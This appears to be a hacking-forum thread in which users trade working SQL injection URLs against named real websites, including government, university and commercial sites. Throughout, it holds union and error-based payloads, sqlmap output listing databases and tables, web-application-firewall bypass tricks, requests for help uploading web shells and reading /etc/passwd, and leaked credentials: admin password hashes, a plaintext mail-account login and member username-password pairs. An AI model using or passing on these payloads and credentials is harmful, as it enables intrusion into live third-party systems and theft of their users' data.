Payload: cid=9 AND (SELECT 2945 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT (ELT(2945=2945,1))),0x716a7a6b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cid=9 AND SLEEP(5)
---
web application technology: Apache, PHP 5.4.42
back-end DBMS: MySQL >= 5.0
available databases [4]:
information_schema
lc_comunidad
lc_dbase
lc_topsites
Code:
http://www.owk.cz:80/philosophy-operation/whoweare/subject.php?id=1 (GET)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 5266=5266
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.12
demafly76
15.08.2016, 19:44
Code:
http://www.dalnoboivideo.ru/page.php?id=-118'+union+select+1,version(),3,4+--+
version: 5.6.28-1+wheezy1+mh2-log
tables: adv,adv_places,pages,places,users,videos
users fields: id,login,password,city,mail,ip,date_reg,priv
Couldn't find the admin panel or anything related to it.((((
WallHack
18.08.2016, 22:05
Code:
http://www.bogatiyhohol.ru/news.php?id=-1%27+union+select+1,@@version,3,4+--+
demafly76
19.08.2016, 19:10
Code:
http://agiperwatch.ru/review.php?id=15'+union+select+1,2,group_concat(0x 3a,schema_name+SEPARATOR+0x0b),concat_ws(0x3a,vers ion(),user(),database())+from+information_schema.s chemata+--+sp
version: 5.1.49-3
user: root@localhost
database: agiperwatch
Drivers & Downloads
HTML:
http://www.drivers-download.com/en/list.php?id=46%20/*!50000union*/%20distinct%20select%201,2,version(),4,5,6,7,8,9,1 0
5.5.48-37.8
TIC 10
AlexaRank 667,198
WallHack
25.08.2016, 18:35
Code:
http://countryfest.ca/page.php?id=72%20OR%20(SELECT%20COUNT(*)%20FROM%20 (SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT% 203)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%20 63),%20FLOOR(RAND(0)*2)))%20--
5.5.50-log
demafly76
26.08.2016, 21:15
Telecom63 - about communication technologies in Samara
Code:
http://www.telecom63.ru/post.php?id=-1'+union+select+1,2,3,@@version,5,6,7,8,9,10,11+--+sp
version: 5.6.25-73.1
TIC: 10
databases:
saminter_telecom63
saminter_63f
saminter_cms00
saminter_db
saminter_ekanevidal
saminter_itvist
saminter_mebeljournal
saminter_pesokbeton
saminter_samboard
saminter_wp
saminter_zavodoy
Code:
http://pksport.ru/post.php?id=-1'+union+select+1,version(),3,4,5,6,7+--+sp
version: 5.5.48-log
Code:
http://alwaystop.ru/post.php?id=-1'+union+select+1,2,concat_ws(0x3a,version()),4,5, 6,7+--+sp
version:
5.1.73-cll
Complete Education Web Portal,Learn English Language Course,Jobs,Immigration,Study Abroad,Student Visa,Universities.and much more..
Code:
http://www.123freenet.com/funnysms/sms.php?id=-3'%20union%20select%201,2,3,4,5,%28select%28select %20concat%28%40%3a%3d0xa7%2c%28select%20count%28%2 a%29from%28information_schema%2ecolumns%29where%28 %40%3a%3dconcat%28%40%2c0x3c6c693e%2ctable_name%2c 0x3a%2ccolumn_name%29%29%29%2c%40%29%29%29,7,8--+f
AR 511,358
AR country 12,642=PK (Pakistan)
5.5.44-0ubuntu0.12.04.1-log
.:[melkiy]:.
31.08.2016, 14:08
Code:
http://www.sironieditore.it/sezioni/articolo.php?ID_libro=978-88-518-0097-0&ID_articolo=-779%27+UNION%20SELECT%201,2,load_file(%27/var/www/htdocs/sironweb/htdocs/sezioni/articolo.php%27),4,5,6,7,8,9,10,11,12,13,14,15+int o+outfile+%27/tmp/sdfgh%27--+
WallHack
13.09.2016, 18:01
Code:
http://www.voshod-invest.ru/biz_show_buy.php?id=-8826+union+select+1,2,@@version,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30+--+
5.0.70-log TIC 20
WallHack
26.09.2016, 13:34
Code:
http://www.dublinsquarepub.com/news.php?id=1%20OR%20(SELECT%20COUNT(*)%20FROM%20( SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%2 03)x%20GROUP%20BY%20CONCAT(MID(VERSION(),%201,%206 3),%20FLOOR(RAND(0)*2)))%20--
5.0.96-log
roundcube SQL result:
Code:
http://mail.dp-dvk.com.ua
username: noc@dp-dvk.com.ua
pasw: noc12345
foxxat said:
↑ (https://antichat.live/posts/3997727/)
roundcube SQL result:
Code:
http://mail.dp-dvk.com.ua
username: noc@dp-dvk.com.ua
pasw: noc12345
so where's the SQLi?
SQLi in a Dota item giveaway service, in the INSERT query on upload, in the file name; you can upload a shell there too.
via error-based it looks like this
Request
Code:
POST /admin/addimg.php HTTP/1.1
Host: dota2h1.ru
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://dota2h1.ru/admin/upload.php
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------271871778025892
Content-Length: 402
-----------------------------271871778025892
Content-Disposition: form-data; name="filename"; filename="' or extractvalue(0x0a,concat(0x0a,(select database()),0x0a, version())) , '"
Content-Type: application/octet-stream
-----------------------------271871778025892
Content-Disposition: form-data; name="upload"
upload
-----------------------------271871778025892--
Response
Code:
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sun, 16 Oct 2016 20:22:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Location: http://dota2h1.ru/admin/upload.php
Content-Length: 59
1105: XPATH syntax error: '
ideawebf_dota
5.6.27-75.0-log'
http://sanatoria.ru/san.php?org=-21...8,329,330,331,332,333,334,335,336,337,338-- + (http://sanatoria.ru/san.php?org=-21%27+UNION+SELECT+1,concat_ws(0x3a,database(),use r(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5 0,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83 ,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,1 00,101,102,103,104,105,106,107,108,109,110,111,112 ,113,114,115,116,117,118,119,120,121,122,123,124,1 25,126,127,128,129,130,131,132,133,134,135,136,137 ,138,139,140,141,142,143,144,145,146,147,148,149,1 50,151,152,153,154,155,156,157,158,159,160,161,162 ,163,164,165,166,167,168,169,170,171,172,173,174,1 75,176,177,178,179,180,181,182,183,184,185,186,187 ,188,189,190,191,192,193,194,195,196,197,198,199,2 00,201,202,203,204,205,206,207,208,209,210,211,212 ,213,214,215,216,217,218,219,220,221,222,223,224,2 25,226,227,228,229,230,231,232,233,234,235,236,237 ,238,239,240,241,242,243,244,245,246,247,248,249,2 50,251,252,253,254,255,256,257,258,259,260,261,262 ,263,264,265,266,267,268,269,270,271,272,273,274,2 75,276,277,278,279,280,281,282,283,284,285,286,287 ,288,289,290,291,292,293,294,295,296,297,298,299,3 00,301,302,303,304,305,306,307,308,309,310,311,312 ,313,314,315,316,317,318,319,320,321,322,323,324,3 25,326,327,328,329,330,331,332,333,334,335,336,337 ,338--%20+)
BabaDook
02.11.2016, 20:24
PHP:
http://www.studioslips.com/selected_model.php?ManID=89&CabID=-4731+/*!UnIoN*/+SeLecT+1111,2222,3333,4444,5555#
Can I do it like this?
BabaDook said:
↑ (https://antichat.live/posts/4008740/)
PHP:
http://www.studioslips.com/selected_model.php?ManID=89&CabID=-4731+/*!UnIoN*/+SeLecT+1111,2222,3333,4444,5555#
Can I do it like this?
you can do it like this
Code:
http://www.studioslips.com/selected_model.php?ManID=89&CabID=-4731+/*!UnIoN*/+SeLecT/**/+1111,version/**/(),3333,4444,5555%23
BabaDook
21.11.2016, 23:53
PHP:
http://www.signsolutions.org.in/product.php?id=74'+and+false+uNiOn+SeLecT+1,2,conc at(uname,0x2020,password),4,5,6,7,8,9,10,11+from+a dmin+--+-
If anyone manages to upload a shell, let me know
WallHack
27.11.2016, 16:22
TIC 1300, decent traffic
Code:
http://carexpert.ru/news/2016-11-24/cn17'%20OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28 SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%2 03%29x%20GROUP%20BY%20CONCAT%28MID%28VERSION%28%29 ,%201,%2063%29,%20FLOOR%28RAND%280%29*2%29%29%29+--+/
http://www.wildflower.org/plants/re...ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- xRGJ (http://www.wildflower.org/plants/result.php?id_plant=-8439%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NU LL,NULL,NULL,NULL,CONCAT(0x716b6a7171,0x6d6450454d 504b4f6e426c78434c47465a4745484e547459716b694f4842 7a7067496d506942487a,0x716b716271),NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL--%20xRGJ)
DezMond™
31.12.2016, 21:53
http://www.vision-control.com/en/pr...er]=1'&cHash=2c2da399e636f5def376af14d3c9b459 (http://www.vision-control.com/en/products-services/product-catalogue/product-catalogue-vision-control/?tx_vcproducts_pi1%5Bcat%5D=tx_vcproducts_class_72 )+and+1=0+union+all+select+1,null,database(),4,5,6 +--+&tx_vcproducts_pi1%5Bproductfilter%5D=1'&cHash=2c2da399e636f5def376af14d3c9b459)
http://m.semtech.com/apps/applications.php?lang=en&id=-9 union select 1,version(),3,4,5,6,7,8 (http://m.semtech.com/apps/applications.php?lang=en&id=-9%20union%20select%201,version(),3,4,5,6,7,8)
TIC 120
AR 136,726
AR country 40,386=CN (China)
Code:
http://vetrb.ru/index_view.php?id=4%27+and+1=0+union+select+1,conc at_ws(0x3a,version(),database()),3+--+f
10.1.21-MariaDB:muslimov_vetrb
TIC 10
Code:
http://www.rubin69.ru/news.php?id=(1)and(select+1+from(select+count(*),c oncat((select%20@@version),floor(rand(0)*2))x+from +information_schema.tables+group+by+x)a)--
5.6.33-79.0-log1 .
Code:
http://www.afghanembassyjp.org/jp/news/?an=-12+union+select+1,database(),3,4,5,6,7,8--
Code:
http://www.divorcemed.com/FAQ/divorce-mediation-faq-2.php?faq_id=-4+union+select+1,2,concat(username,0x3a,password), 4,5,6+from+users+limit+1,1--
DezMond™
03.02.2017, 17:18
Code:
http://www.so-toulouse.com/organiser-sa-venue/les-acteurs-par-categorie/agences/fiche-agence/acteur/pgo/-9+union+select+1,2,3,4,5,6,7,8,9,user(),11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27+--+.html#.WJR_cENMIb8
Code:
http://www.dublinsquarepub.com/news.php?id=-1+union+select+1,version(),database(),4,5,6--
Code:
http://www.drinksontario.com/memberinfo.php?id=-70+union+select+all+1,2,3,4,5,6,7,8,9,10,database( ),version(),13,14
Code:
http://bellasamui.com/koh-samui-shopping.php?id=-8+union+select+all+1,2,3,database(),version(),6
Code:
http://yggdrasilrecords.net/releases.php?id=-5+union+select+all+1,database(),version()
Code:
http://www.bestrent.fi/en/book-now.php?id=-304+union+select+all+1,2,version(),4,5,6,7,8,9,10, 11,12,13,14,database(),16,17,18,19,20,21
Code:
http://nightgallery.ca/artist.php?id=-98+union+select+all+1,version(),database(),4,5,6,7 ,8,9
Code:
http://www.nbrri.gov.ng/sites/news.php?ID=-57+union+select+all+1,2,3,4,5,6,7,8,9,10,11,12
Here's a Thai university for you
Code:
http://www.maireang.ac.th/detail.php?id=-9+union+select+1,2,3,version(),5,6,7,8--
University of Sheffield Film Unit
Code:
http://filmunit.union.shef.ac.uk/film.php?id=-392+union+select+1,2,3,4,@@version,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22--
Code:
http://www.valiani.com/manual_detail.php?ID=-5+union+select+1,2,3,concat_ws(0x3a,version(),data base()),5,6,7--
Code:
http://www.lotus-invest.ps/more-news.php?id=-7+union+select+1,2,version(),4,5,6--
P.S. Folks, where are you?
SQL http://www.giftmakers.co/product.php?id=513
Database: ftradmin
admin 93ce7e8d523ea9eaf8bab0450f1b5960
Never did find the admin panel...
http://www.sonic360.com/artist.news.inc.php?id=
whoever manages to upload a shell, post back...
Code:
http://www.hier.iif.hu/hu/educatio_reszletes.php?id=-51+union+select+1,2,version(),4,5,6,7,8,9,10,11--
P.S. Only found and fully exploited SQLi get posted here!!! Stop flooding the thread!!!
DezMond™
04.04.2017, 12:42
DA63
Code:
https://www.stmoritz.ch/en/st-moritz/event-calendar/details/?no_cache=1&print=1&cHash=46001ddfd00d1f1a92cc4128d684e94c&event_id=4693067+and(select+1+from(select+count(*) ,concat((select+(select+concat(usr_login_name,0x3a ,usr_password))+from+adm_users+limit+1,1),floor(ra nd(0)*2))x+from+adm_users+group+by+x)a)+and+1=1
Philippine Government
Government Procurement Policy Board
Code:
http://www.gppb.gov.ph/opinions/view_nonpolicy.php?id=-566%27+union+select+1,version(),3,4,user(),databas e()+--+
joelblack
14.04.2017, 14:02
Code:
https://stat.internet.su/
Username: ' OR 1=1 --
Mike 007
23.04.2017, 05:37
http://www.samotur.ru/infoitem.php?id=-2' (http://www.samotur.ru/infoitem.php?id=-2%27)
couldn't log in though)
http://www.samotur.ru/admin
can anyone tell me what the problem is?
http://profstud.zabgu.ru/view_actual.php?id=-1'
Administrator | f7999a0b10f3783fa848fea8fbeb6a18fa2wm8 | profstud.zabgu@mail.ru (mailto:profstud.zabgu@mail.ru) | Сергей | Воронин
any thoughts on the hash?)
Mike 007
24.04.2017, 15:58
http://yggdrasilrecords.net/artists.php?id=-1+union+select+concat(0x3a,(user())),database(),3
Table: ygg_sys_users
[5 columns]
+-------------+---------------------+
| Column | Type |
+-------------+---------------------+
| displayname | varchar(255) |
| group_id | tinyint(3) unsigned |
| password | varchar(128) |
| user_id | tinyint(3) unsigned |
| username | varchar(64) |
+-------------+---------------------+
help me take it all the way)
Assorted forex sites
Code:
http://supertrader.co.th/season3/article-detail.php?id=-1 union all select 1,version(),3,4,5,group_concat(table_name),7,8,9,1 0,11,12 from information_schema.tables where table_schema=database() --+
26 tables:
account
bannercategory
bannerhome
battle
gallery
gallerycategory
member
***
userlogin
websiteinfo
sptrader_season3|5.1.73|supertrad_db3@localhost
Code:
http://www.thaiforexschool.com/view-article.php?id=1'+union+all+select+group_concat(ta ble_name) from information_schema.tables where table_schema=database()+--+&name=Divergence%20Trading
28 tables:
admin_management
answer
article
books
categorytest
course2013
***
member
news
nt_act
nt_act1
nt_photo
nt_photo1
question
register_course
student_do_pre
thaiforex_smf|5.1.65|thaiforex@localhost
Code:
https://www.worldforexbrokers.com/wf-directory/post-detail.php?id=84' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 54,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+
55 tables
0,1::wfbrokers_admin::
1,1::wfbrokers_advertisements::
2,1::wfbrokers_advertisementstypes::
3,1::wfbrokers_announcement::
4,1::wfbrokers_assignbroker::
5,1::wfbrokers_bankrates::
6,1::wfbrokers_banner::
***
54,1::wfbrokers_videos::
::worldforex_livedb::5.6.35-cll-lve::wfblivedbusr@localhost::
BabaDook
18.05.2017, 22:27
Haha, spent half an hour getting the output to work. That's what lack of practice does
PHP:
http://www.indoramaeleme.com/media.php?id=59+u%6eion select 1,2,c%6fnc%61t(0x 223c2f7465%37%38%37%34%36%317265613e27273e3c73%36% 33%37%326970743e616c6572742822,table%5f%6e%61%6de, 0x3e3e,%63%6f%6c%75%6d%6e%5f%6e%61%6d%65,0x22293b3 c2f7363726970743e),4,5,6,7,8+%20%66%72%6f%6d%20%69 %6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%6 1%2e%63%6f%6c%75%6d%6e%73%20%77%68%65%72%65%20%54% 41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42 %41%53%45%28%29+--+-
reading files via hex(load_file(file)); the output is encoded, naturally; whoever gets proper output, please share
PHP:
substring(load_file('/etc/passwd'),0,1)
So, I opened the docs and realized that 30% of what exists isn't available in Russian.
Abu Dhabi Cricket Club
Code:
http://www.adcricketclub.ae/news_detail.php?newsID=-123+union+select+1,concat(0x3a,user(),database()), 3,4,5,6--
Malda College, India
Code:
http://www.maldacollege.ac.in/current-news.php?id=-35+union+select+1,version(),3,database()--
Code:
view-source:http://bw-plast.com/en/news.php?id=-2+union+select+1,2,3,4,5,6,7,version(),9,10,11,12, 13,14--
5.1.73-14.12-log
Code:
http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32+--+
Code:
http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,(se lect+concat(@a,0x5B2F44554D505D)+from(select+@a:=0 x5B44554D505D,(select+@a+from+information_schema.c olumns+where+table_schema=database()+and+@a:=conca t(@a,table_name,0x09,column_name,0x0A)))a),7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32+--+
Spoiler: Result
Code:
http://www.severven.ru/base1/readmore.php?id=%27+union+all+select+1,2,3,4,5,(se lect+concat_ws(0x09,username,password,salt,admin)f rom+users+limit+0,1),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+
Code:
administrator *hash was here* 1
Code:
http://www.severven.ru/robots.txt
PHP:
Missing Controller
Error: Robots.txtController could not be found.
Error: Create the class Robots.txtController below in file: app/controllers/robots.txt_controller.php
Notice: If you want to customize this error message, create app/views/errors/missing_controller.ctp
Code:
view-source:http://mstream.fr/webtv/film.php?id=-1+union+select+1,2,@,4,5,6,7,8,9,10,11+from(select +@:=0x00,(select+@+from+wp_users+where+@:=concat(@ ,user_login,0x09,user_pass,0x0a)))q
Code:
http://www.greenwall.org/recent-news.php?id=-22+union+select+1,2,version(),4,database(),6,7,8,9 ,10,11,12,13,14,15,16--
DezMond™
15.06.2017, 17:46
Code:
http://www.so-toulouse.com/index.php?id=167&act=-68+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27+--+
Code:
http://mobile-phone-buy.ru/buy_mobile.php?pc=DOOGEE-T5%27+union+all+select+%27%3E%3Cscript%3Ealert("Hacked By extjs")%3C/script%3E%27--+
http://www.casuals.ru/product_info.php/products_id/11164'%20and%20extractvalue(0x00,concat(0x0a,(sele ct%20table_name%20from%20information_schema.tables %20where%20table_name%20like%20'%25user%25'%20limi t%203,1)))--%20/category/1
WallHack
28.06.2017, 13:42
550 TIC
Code:
http://www.landscrona.ru/tales/index.php?id=-111+union+select+1,2,3,@@version,5,6,7,8,9,10,11,1 2,13,14,15,16+--+
30 TIC
Code:
http://www.avon-beauty.ru/index.php?show_aux_page=(ExtractValue(1,concat(0x3 a,(select(version())))))
60 TIC
Code:
http://sejo.ru/index.php?page=119+union+select+1,2,3,4,@@version, 6,7,8,9,10,11+--+1
At the bottom
Code:
view-source:http://www.nesprosta.ru/?type=content&id=29'
HTML:
База данных квартир: купить квартиру в Москве, снять квартиру (Москва), цены на квартиры, объявления недвижимость - Nesprosta.ru
Code:
http://www.trest14perm.ru/newbuildings/?show_id=37+and+1=10+uNion+all+select+1,2,3,4,5,6, 7--
HTML:
SQL Error: The used SELECT statements have a different number of columns at /home/trest14prm/trest14perm.ru/docs/wbk-cms/module/objects.php line 47
Array
(
[code] => 1222
[message] => The used SELECT statements have a different number of columns
[query] => SELECT DISTINCT * FROM geocard,geomarks WHERE act=1 and geocard.type=geomarks.id and obj1=37 and 1=10 uNion all select 1,2,3,4,5,6,7-- GROUP BY type
[context] => /home/trest14prm/trest14perm.ru/docs/wbk-cms/module/objects.php line 47
)
Code:
http://kras-city.ru/info_krsnr.php?num=1%27+union+all+select+1,2,3,4,5 ,6,7,8,9,10,(select(@)from(select(@:=0x00),(select (0)from(information_schema.columns)where(table_sch ema!=0x696e666f726d6174696f6e5f736368656d61)and(0x 00)in(@:=concat(@,0x3c6c693e,table_schema,0x2e,tab le_name,0x3a,column_name))))a),12--+[
How do I bypass this?
Code:
http://www.meatbranch.com/advert/magazine.html'+and+'1'='1
Code:
http://www.teplopoint.ru/'--+[
Code:
http://www.zorginox.ru/sobitiya/504/'%20and%20'1'='1
Code:
http://an-tarusa.ru/View.aspx?id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
still don't know what to do with this Jet Database
DezMond™
04.08.2017, 11:35
https://www.holmesdale.net/link.php?id=-3+union+select+111+--+
АО «Сибирский реестр»
Code:
http://www.sibreg.ru/doc.php?id=-13827+union+select+1,2,3,concat_ws(0x3a,version(), database(),user()),5,6,7,8,9,10--&menu=about
Clínica Medilaser Neiva
Code:
http://www.clinicamedilaser.com.co/branch.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5--
Code:
http://www.kupa.pl/pl/humor.php?id=16
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=16 AND 1103=1103
Type: AND/OR time-based blind
Title: MySQL
available databases [15]:
cursosoxford
information_schema
moodle
mysql
oxfordazuero2015
oxfordazuero2016
oxfordazuero2017
oxforddavid2016
oxforddavid2017
oxfordsantiago2015
oxfordsantiago2016
oxfordsantiago2017
performance_schema
phpmyadmin
temp
http://oxfordsantiago.com/index.php...ng_id=68&Itemid=650&establename=massmessaages (http://oxfordsantiago.com/index.php?option=com_extrasearch&view=details&listing_id=68&Itemid=650&establename=massmessaages)
Code:
http://adamslove.org/en-d.php?id=85
(GET)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=85' AND 1057=1057 AND 'wZNL'='wZNL
SlipX said:
↑ (https://antichat.live/posts/4115704/)
Code:
http://adamslove.org/en-d.php?id=85
(GET)
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=85' AND 1057=1057 AND 'wZNL'='wZNL
And who needs this?
SlipX said:
↑ (https://antichat.live/posts/4115724/)
couldn't finish exploiting it, blind
Code:
http://adamslove.org/en-d.php?id=85'+or+1+group+by+mid(version(),rand(0)|0 )having+avg(0)%23
MySQL error: 1062 (Duplicate entry '5.5.51-38.2' for key 'group_key')
Where's the blind here? Or do you always rely only on sqlmap? And yes, Mod_security is present there, so we use non-standard whitespace and wrap the operators in versioned comments (example /*!12345union*/%0aselect)!
sorry for the flood, but why the hell post links to vulnerable sites if you can't even exploit the vulnerability?
and now on topic:
Code:
http://www.imrs.rs/index.php?id=-67+union+select+1,2,3,4,5,database(),7,8,9,10,11,v ersion(),13,14,15,16,17,18,19,20,21--
joelblack
14.08.2017, 02:38
target: http://www.tissueeng.net
type:SQL Injection
Code:
http://www.tissueeng.net/lab/peopleDetail.php?id=-424+/*!50000union*/+/*!50000select*/+1,user(),3,4,5,version(),7--+
user: tissueen_erikp@localhost
version:5.6.32-78.1-log
Spoiler
http://www.kandiusa.com/product_list.php?id=1
Database: kandiusa
+---------+---------+
| Table | Entries |
+---------+---------+
| custom | 8877 |
| product | 4703 |
| orderm | 3843 |
| parts | 597 |
| class | 372 |
| sort | 76 |
| wty | 3 |
| admn | 2 |
| reg | 1 |
+---------+---------+
Spoiler: bd
http://www.cambridgesilversmiths.com/browse/detail.php?id=2504
available databases [48]:
http://www.pinoy-market.com/store.php?id=136
available databases [5]:
information_schema
mysql
ofertas
pinoy
test
http://www.ecgi.de/wp/wp_id.php?id=213
available databases [3]:
db1081552-ecgi1
db1081552-ecgi2
information_schema
http://www.kupa.pl/pl/humor.php?id=16
available databases [1]:
baza777
// Don't flood with repetitive messages.
// Combine them into one post; don't create extra work for the moderators
// ВВ
tvet.ps/home.php?org=43
available databases [2]:
information_schema
tvetps_db
Code:
http://www.pizzifarm.com/printerfriendly.php?id=-25+union+select+version()+--+
4.1.20
ЗАО НПЦ «АСПЕКТ»
Code:
http://aspect.dubna.ru/new/news.php?id=-222+union+select+@@version--
Code:
http://www.immobilien-bender.com/download_blob.php?ID_KATALOG_FILE=99' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a787a71, 0x556a6d655550696468517a6654417a59597750744f654b71 64566e64624876594f58704345774b72,0x7170706a71),NUL L,NULL,NULL,NULL,NULL-- WNxl
http://mycompaniesact.com/orders.php?id=401
Code:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=401' AND 5514=5514 AND 'bTax'='bTax
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=401' AND (SELECT 9875 FROM(SELECT COUNT(*),CONCAT(0x7170627871,(SELECT (ELT(9875=9875,1))),0x7162717a71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'niid'='niid
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=401' AND SLEEP(5) AND 'TmYG'='TmYG
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=401' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717062 7871,0x4975495a54675364526f6847444d55556c714d50736 1564a62794f486f5242756f6b65674d436f48,0x7162717a71 )-- srbU
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
available databases [24]:
cashflow
cashflowblog
cim
complyzone
complyzoneblog
gstcomplyzone
gstseekho
gstseekhoapp
information_schema
mppcos
mycompaniesact
mycompaniesact_blog
mysql
performance_schema
permier
phpmyadmin
punitecom
rishab
sammiraman
ssluthra
trackmyinvoice
uniqueshiksha
unocalecom
Vendor_Payment_Generation
BabaDook said:
↑ (https://antichat.live/posts/4135597/)
Bet you can't upload a shell?
Unfortunately yes, I'm not that strong at this, I don't even know where to start
If only there were someone to teach me)
http://www.sfgames.ru/gameS.php?id=232
Code:
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 268 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=232 AND 5858=5858
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=232 AND SLEEP(5)
---
[18:55:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
Code:
https://video.bbb.org/vncSearch.php?category=13 UNION ALL SELECT NULL,CONCAT(0x716a6a7671,0x644b4861496f58545558536 8634d4e6c55486a43776876725058495543634550414945467 4624f61,0x716a786b71),NULL,NULL,NULL,NULL-- ERFG&bureauId=
available databases [3]:
bbbvideo
information_schema
test
karkajoi
11.10.2017, 19:18
Code:
http://de.u7buy.com/news/news.html?date=2016-09%' AND 1010=1010 AND '%'='
available databases [1]:
u7buy_dbs
Code:
http://smmmafia.com/gobig/tnsnfri/rcknrol.php?geo=US' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x6e4e5a72734174575a6f694 6495a77786d4142695a6c6b5a594c647a6b694641465742647 9557962,0x71767a6b71)-- hajN
Any ideas what this site is and what it's for?
http://www.vpscro.com/cn/about.php?id=166
Code:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=166 AND 3378=3378
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=166 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171627071,(SELECT (ELT(2938=2938,1))),0x7178627071,0x78))s), 8446744073709551610, 8446744073709551610)))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=166 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: id=-4940 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627071, 0x794e677a4367776d4c75676a55677158705a414c684b4468 6c4b67546f545979546e4d636c594a53,0x7178627071),NUL L,NULL,NULL,NULL,NULL-- FkYN
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, PHP 5.5.10, Microsoft IIS 7.0
back-end DBMS: MySQL >= 5.5
available databases [18]:
bugtracker
dzzoffice
eyao
hdm0130219_db
hdm0580028_db
information_schema
mysql
performance_schema
pigcms
test
tsoa
ucenter
uchome
vp_phpcms
vp_xcx
vppr
wecenter
wqjk
karkajoi
15.10.2017, 13:18
Can't get the columns out of the tables; whoever manages it, send the vector via PM.
accounts for logging in (it won't work without them)
Code:
hopkins123:hopkins1
KlausuPirelli:pirelli1
Vishnu24:Ackbar24
momoneyg08:wordupho
Code:
http://www.pacinonetworkpass.com/members/frame.php?site=lazonamodelos/content.php?show=models&id=368+and+updatexml(NULL,concat(0x3a, ( select database()) ),Null)-- -&template_set=3
XPATH syntax error: ':sitedepth'
